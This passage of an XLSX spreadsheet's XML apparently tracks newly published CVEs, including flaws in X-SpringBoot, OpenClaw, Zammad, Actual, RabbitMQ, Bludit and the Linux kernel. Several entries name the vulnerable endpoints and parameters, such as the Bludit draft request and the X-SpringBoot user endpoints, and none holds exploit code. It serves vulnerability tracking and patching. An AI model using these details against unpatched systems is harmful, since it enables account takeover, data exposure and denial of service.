      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q107" s="5" t="inlineStr"/>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S107" s="5" t="inlineStr">
        <is>
          <t>X-SpringBoot through 6.0 lacks object-level authorization in user management endpoints, allowing sub-administrators to modify or delete users without ownership verification. Attackers with user-management permissions can reset passwords for any account including the super administrator, rebind roles, or delete users via POST /sys/user/update and POST /sys/user/delete endpoints.</t>
        </is>
      </c>
      <c r="T107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97060</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100555</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="inlineStr"/>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr">
        <is>
          <t>npm, gin</t>
        </is>
      </c>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q108" s="5" t="inlineStr"/>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S108" s="5" t="inlineStr">
        <is>
          <t>OpenClaw is an npm-distributed gateway application. In versions &gt;= 2026.7.1 and &lt; 2026.8.1, Synology Chat attachment delivery could lose DNS pinning: the Gateway validated a single DNS result for a supplied file URL but then passed the original hostname to the Synology NAS, where it could resolve to a different destination. When attachment delivery accepted a remotely influenced hostname, an attacker could use DNS rebinding to make the NAS fetch a private or otherwise policy-denied resource and return its contents to the addressed conversation (server-side request forgery). Practical impact depends on NAS routing, resolver behavior, and the response available at the private destination. The issue is fixed in 2026.8.1; as a workaround, disable remote URL attachment forwarding in Synology Chat.</t>
        </is>
      </c>
      <c r="T108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100555</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100598</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="inlineStr"/>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr">
        <is>
          <t>npm, react</t>
        </is>
      </c>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q109" s="5" t="inlineStr"/>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="S109" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package openclaw) before 2026.7.1 incorrectly binds Signal approval reactions. In affected versions, a reaction intended to resolve a structured approval request could instead attach to ordinary outbound text when unrelated outbound messages and a pending approval are present in the same conversation. As a result, an approver's reaction to unrelated text could be interpreted as approving or denying a pending host action; the practical impact depends on the pending request, conversation timing, and the actions available to the OpenClaw process. The issue does not change the authority of correctly identified approvers. This is fixed in version 2026.7.1.</t>
        </is>
      </c>
      <c r="T109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100598</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56723</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="inlineStr"/>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q110" s="5" t="inlineStr"/>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S110" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, a customer who can view a ticket cannot see internal ticket articles through the article listing API. However, the same customer can directly request an attachment belonging to an internal article via the attachment download endpoint, bypassing article-level authorization. This results in an inconsistency: The article listing hides internal articles from customers. The attachment download only checks the parent ticket, not the article, so the same customer can download the attachment directly. This issue is fixed in version 7.0.2.</t>
        </is>
      </c>
      <c r="T110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56723</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56727</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="inlineStr"/>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr">
        <is>
          <t>go, rust</t>
        </is>
      </c>
      <c r="K111" s="5" t="inlineStr"/>
      <c r="L111" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q111" s="5" t="inlineStr"/>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-347, CWE-391</t>
        </is>
      </c>
      <c r="S111" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, summary In Zammad's inbound PGP email processing, the return value of the gpg verification call was silently discarded. Regardless of whether gpg reported a valid, invalid, or missing signature, the handler unconditionally wrote sign: { success: true, comment: "Good signature" } to the article's security preferences. Impact Any sender could tamper with the body of a multipart/signed PGP email, or craft a message with an entirely fabricated or mismatched signature, and Zammad would display it to the recipient as cryptographically verified with a "Good signature" label. Users and agents relying on Zammad's signature indicator to confirm message authenticity and integrity would be misled into trusting modified or forged content. The vulnerability affects all inbound PGP-signed emails processed while the PGP integration is enabled. This issue is fixed in version 7.0.2.</t>
        </is>
      </c>
      <c r="T111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56727</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57449</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="inlineStr"/>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr">
        <is>
          <t>github, requests, gin</t>
        </is>
      </c>
      <c r="K112" s="5" t="inlineStr"/>
      <c r="L112" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q112" s="5" t="inlineStr"/>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284, CWE-863</t>
        </is>
      </c>
      <c r="S112" s="5" t="inlineStr">
        <is>
          <t>Actual is a local-first personal finance tool. Prior to 26.7.0, Actual Sync Server's CORS proxy is intended to let authenticated users fetch resources only from repositories listed in the official plugin allowlist. When `ACTUAL_GITHUB_TOKEN` is configured, the proxy automatically attaches the server's GitHub token to GitHub requests. The GitHub API allowlist check uses a raw `startsWith()` prefix test for `/repos/{owner}/{repo}` without requiring a path boundary after the repository name. If an allowlisted public plugin repository is `https://github.com/acme/plugin`, the proxy also accepts GitHub API URLs. Those URLs are outside the allowlisted repository but still pass because their API path starts with `/repos/acme/plugin`. The proxy then forwards the request with the server's `ACTUAL_GITHUB_TOKEN`, allowing any authenticated Actual user to read private GitHub resources reachable by that token. Version 26.7.0 fixes the issue.</t>
        </is>
      </c>
      <c r="T112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57449</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67408</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="inlineStr"/>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr">
        <is>
          <t>docker, requests, gin</t>
        </is>
      </c>
      <c r="K113" s="5" t="inlineStr"/>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q113" s="5" t="inlineStr"/>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S113" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.1.0 until 4.3.3, 4.2.9, and 4.1.11, Stream Management Super-Stream Binding Keys Allocation Allows Low-Privilege Node Denial of Service. rabbitMQ 4.3.1 with rabbitmqstreammanagement enabled accepts PUT /api/stream/super-streams/{vhost}/{name} requests from an authenticated management user that can access the target vhost. When the request body contains the binding-keys field, the handler parses the attacker-controlled comma-separated string and builds the full stream-name list before checking whether the user has permission to configure the resulting streams. A low-privileged management user with vhost access but no configure, write, or read permission can therefore force large transient allocations before the resource permission check. In a 768 MB memory-limited container, one HTTP PUT with about 4.5 MB of JSON body killed the RabbitMQ container with Docker state exited true An authenticated low-privileged management user can kill a memory-limited RabbitMQ node with one HTTP This issue is fixed in versions 4.3.3, 4.2.9, and 4.1.11.</t>
        </is>
      </c>
      <c r="T113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67408</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67419</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="inlineStr"/>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K114" s="5" t="inlineStr"/>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q114" s="5" t="inlineStr"/>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-407</t>
        </is>
      </c>
      <c r="S114" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. Prior to 4.3.5, an authenticated user who can bind a queue to a topic exchange and publish to it can use consecutive # segments in a binding key to make both topic matchers revisit the same trie-node and routing-key-suffix states without memoization. The matcher materializes duplicate destinations before deduplication, causing combinatorial CPU work and memory pressure that can disrupt routing for all tenants. This vulnerability is fixed in 4.3.5.</t>
        </is>
      </c>
      <c r="T114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67419</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84465</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="inlineStr"/>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K115" s="5" t="inlineStr"/>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q115" s="5" t="inlineStr"/>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-295, CWE-347</t>
        </is>
      </c>
      <c r="S115" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, when Zammad checks the digital signature on an incoming S/MIME-signed email, it does not verify that the signing certificate is genuinely trusted, it only checks whether a certificate with a matching name is already stored in the system. An attacker can create their own certificate using the name of a real, previously trusted sender and use it to send a forged email. Zammad will display that email with the same "validly signed" indicator as a genuine message from the real sender, even though the attacker never had access to that sender's actual certificate or private key. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84465</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93365</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="inlineStr"/>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K116" s="5" t="inlineStr"/>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q116" s="5" t="inlineStr"/>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S116" s="5" t="inlineStr">
        <is>
          <t>Bludit CMS through 3.22.0 contains a missing authorization vulnerability that allows authenticated users holding the Author or Editor role to read the full content of private drafts and scheduled posts belonging to any other user, including administrators, by exploiting the content-get-list AJAX endpoint in bl-kernel/ajax/content-get-list.php. Attackers can send an authenticated GET request to the admin AJAX endpoint with the draft parameter set to true, triggering getList() without ownership constraints and returning serialized page objects site-wide, exposing pre-publication material and sensitive notes stored in administrator-owned drafts.</t>
        </is>
      </c>
      <c r="T116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93365</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97589</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="inlineStr"/>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K117" s="5" t="inlineStr"/>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q117" s="5" t="inlineStr"/>
      <c r="R117" s="5" t="inlineStr"/>
      <c r="S117" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/crypto: Fix wrong return code to engine in asynch callbacks
When crypto_finalize_hash_request() or
crypto_finalize_skcipher_request() explicitly completes a request, the
do_one_request callback must return 0 to indicate successful
handling. Returning a negative error code causes the crypto engine to
assume the driver failed to take ownership and triggers a second
completion via crypto_request_complete(), resulting in a double
completion. This pattern occurs in paes_s390.c 4 times and once in
phmac_s390.c.
Fixed in phmac_do_one_request() and all four paes do_one_request
callbacks (ecb, cbc, ctr, xts) by returning 0 after explicit
finalization instead of propagating the error code.</t>
        </is>
      </c>
      <c r="T117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97589</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97608</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="inlineStr"/>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K118" s="5" t="inlineStr"/>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q118" s="5" t="inlineStr"/>
      <c r="R118" s="5" t="inlineStr"/>
      <c r="S118" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_log: unregister loggers before per-net teardown
nf_log_syslog and nfnetlink_log unregister their per-network namespace
operations before unregistering their global logger backends. This
leaves a window where a sysctl or netlink writer can rebind the still-
registered logger after the per-net pre-exit callback cleared the old
selection.
The race looks like this:
  CPU 0                                 CPU 1
  ----                                  ----
  unregister_pernet_subsys()
    nf_log_unset(net, logger)
      net-&gt;nf.nf_loggers[pf] = NULL
                                        lock nf_log_mutex
                                        find logger in loggers[][]
                                        net-&gt;nf.nf_loggers[pf] = logger
                                        unlock nf_log_mutex
  nf_log_unregister(logger)
    lock nf_log_mutex
    loggers[pf][type] = NULL
    unlock nf_log_mutex
    synchronize_rcu()
  module exit returns
  module core frees backend memory
Later, a sysctl read or packet logging operation can dereference the
stale per-net logger pointer.
Fix this by unregistering the global logger backends before tearing down
per-net state. Once the global registrations are gone, later writers can
no longer rebind the logger. unregister_pernet_subsys() already waits
for an RCU grace period after the pre-exit callback clears the per-net
selection, while nf_log_unregister() continues to cover readers of the
global logger table.
Apply this ordering fix to both nf_log backends that combine per-net
teardown with global logger registration.</t>
        </is>
      </c>
      <c r="T118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97608</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97931</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="inlineStr"/>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q119" s="5" t="inlineStr"/>
      <c r="R119" s="5" t="inlineStr"/>
      <c r="S119" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: us122l: Prevent write upgrades for read mappings
The hwdep mmap callback rejects read-buffer mappings that are initially
writable, but leaves VM_MAYWRITE set on mappings created with PROT_READ.
A process that can open the hwdep node O_RDWR can later use mprotect() to
make the mapping writable.
The read allocation begins with struct usb_stream. Its read_size member is
used by the fault handler to decide which pages belong to the read buffer.
The read VMA intentionally remains expandable because pcm_usb_stream uses
mremap() after reading that size. Changing read_size first can therefore
map and access pages beyond the allocation. The same member is also
consumed by usb_stream_free(), where changing it can make
free_pages_exact() release pages outside the allocation.
Clear VM_MAYWRITE for read-buffer mappings after rejecting an initially
writable VMA. This keeps the separate output-buffer mapping writable while
preventing later permission upgrades.</t>
        </is>
      </c>
      <c r="T119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97931</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97953</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="inlineStr"/>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K120" s="5" t="inlineStr"/>
      <c r="L120" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q120" s="5" t="inlineStr"/>
      <c r="R120" s="5" t="inlineStr"/>
      <c r="S120" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: stmmac: fix TX descriptor availability check for TSO traffic
stmmac_tso_xmit() estimates the number of free TX descriptors required by
a TSO skb as:
	(skb-&gt;len - proto_hdr_len) / TSO_MAX_BUFF_SIZE + 1
which assumes the payload is split into TSO_MAX_BUFF_SIZE chunks. This
underestimates the descriptors actually consumed by stmmac_tso_allocator(),
since each fragment is mapped individually and so it needs at least one
descriptor regardless of its size. Moreover, one descriptor is used for
the L2/L3/L4 headers and, when the MSS changes, one more is consumed for
the MSS context descriptor.
For a highly fragmented TSO skb the check can therefore pass even when the
ring has too few free slots. stmmac_tso_allocator() then writes past the
available descriptors, overwriting descriptors still owned by the DMA
engine, corrupting the TX ring.
Add stmmac_tso_get_num_desc() to compute the exact number of descriptors
needed for the header, the linear payload and each fragment, plus the MSS
context descriptor when required, and use it in the availability check.</t>
        </is>
      </c>
